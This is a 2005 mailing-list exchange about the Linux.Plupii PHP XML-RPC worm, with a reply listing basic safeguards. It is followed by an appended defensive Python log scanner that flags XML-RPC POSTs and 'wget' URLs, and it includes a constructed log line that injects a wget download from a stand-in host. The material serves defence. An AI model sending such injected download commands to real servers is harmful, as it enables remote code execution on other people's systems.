Linux worm crawls the web, what to do to protect our systems

James Kosin jkosin at beta.intcomgrp.com
Mon Nov 7 22:48:21 UTC 2005


Antonio Olivares wrote:

>Dear List,
> A strange worm is going around the web. It attacks
>some vulnerabilities in PHP.
>
>From
>http://www.securityfocus.com/brief/38?ref=rss
>
>cut+paste here
>=====================================================
>A new Linux worm is crawling the web looking for a
>large number of vulnerable PHP systems and
>applications. The worm, known as Linux.Plupii
>(Symantec) or Linux/Lupper.worm (McAfee), is rated as
>a Category 2 worm by Symantec, while McAfee considers
>the risk "low." The worm installs a Trojan using wget
>and the attack allows for arbitrary code execution
>under the privileges of the web server user.
>
> The worm exploits PHP based vulnerabilities
>discovered back in June, and affects a large number of
>PHP web applications that use XML-RPC. The Trojan
>makes simple requests to web servers running on port
>80 and the attack has been well documented by SANS.
>Unpatched systems are ripe for exploitation. Affected
>systems will need to be wiped and have the OS
>reinstalled, in most cases.
>
> The report comes on the heels of a new PHP release
>that addresses more security issues. Readers are also
>reminded of the Perl-based Santy worm and its variants
>as an indication that web-based worms that target
>Linux and Unix applications are becoming much more
>commonplace.
>
>=====================================================
>
>What can we do to escape the threat of this worm?
>Does it need root privilege? I am asking this
>because it is an imminent danger, and how do we secure our
>PCs?
>
>Thanks,
>
>Antonio
>
>
>
>
>
I wouldn't overreact...

I believe this has been taken care of some time ago.  FC1 doesn't have
the exploit and I'm sure FC4 definitely does not.

Safeguards:
------------
(1)  Unless the PC is a server, disable the httpd service.
(2)  Check the PC for the files they are commonly trying to access.
If the PHP files are not there, they can't affect your system.
(3)  Keep your packages updated.  If not posted to Bugzilla, try
posting this there.  Security issues are important if not noticed and
acted upon.

Thanks,
James Kosin
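As an added example (not code from the list, from James, or from the worm reports), here is a defender-side check that follows safeguard (2) and the worm description above: it looks for XML-RPC PHP entry points under a web root and flags access-log requests that match the worm's pattern, a POST to such an endpoint or a URL carrying "wget". The filenames xmlrpc.php/xmlrpcs.php, the web root path and the log lines are assumptions and constructed samples; the post names none of them.

```python
"""Check a web root for XML-RPC PHP entry points and scan httpd access logs
for requests matching the worm's pattern. Added example for this thread;
entry-point names and sample log lines are assumed/constructed."""
import os
import re

# Assumed XML-RPC PHP entry-point basenames (the post names no files).
XMLRPC_NAMES = ("xmlrpc.php", "xmlrpcs.php")

def flag_xmlrpc_paths(paths):
    """Return the given paths whose basename is an XML-RPC PHP entry point."""
    return sorted(p for p in paths if os.path.basename(p).lower() in XMLRPC_NAMES)

def find_xmlrpc_files(webroot):
    """Walk a web root (e.g. /var/www/html) and return XML-RPC entry points found.
    If none are present, safeguard (2) says this worm has nothing to hit."""
    found = []
    for dirpath, _dirs, files in os.walk(webroot):
        found.extend(os.path.join(dirpath, f) for f in files)
    return flag_xmlrpc_paths(found)

# Apache common log format: host ident user [time] "METHOD url PROTO" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')

def suspicious_requests(log_lines):
    """Return (ip, method, url, status) for requests matching the worm's pattern:
    a POST to an XML-RPC endpoint, or a URL carrying 'wget' (the brief says the
    worm fetches its trojan with wget). Unparseable lines are skipped."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = m.group("url")
        path = url.split("?", 1)[0]
        is_xmlrpc_post = m.group("method") == "POST" and bool(flag_xmlrpc_paths([path]))
        if is_xmlrpc_post or "wget" in url.lower():
            hits.append((m.group("ip"), m.group("method"), url, m.group("status")))
    return hits

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Nov/2005:22:10:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '10.0.0.9 - - [07/Nov/2005:22:10:02 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 200 330',
    '10.0.0.9 - - [07/Nov/2005:22:10:03 +0000] "GET /a.php?x=wget%20http://example.invalid/t HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
    print("xmlrpc files under /var/www/html:", find_xmlrpc_files("/var/www/html"))
```

Point suspicious_requests at the real /var/log/httpd/access_log to review actual traffic; a hit on a host that does not even have the PHP files is noise, while a hit on one that does is a reason to follow safeguard (3) promptly.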
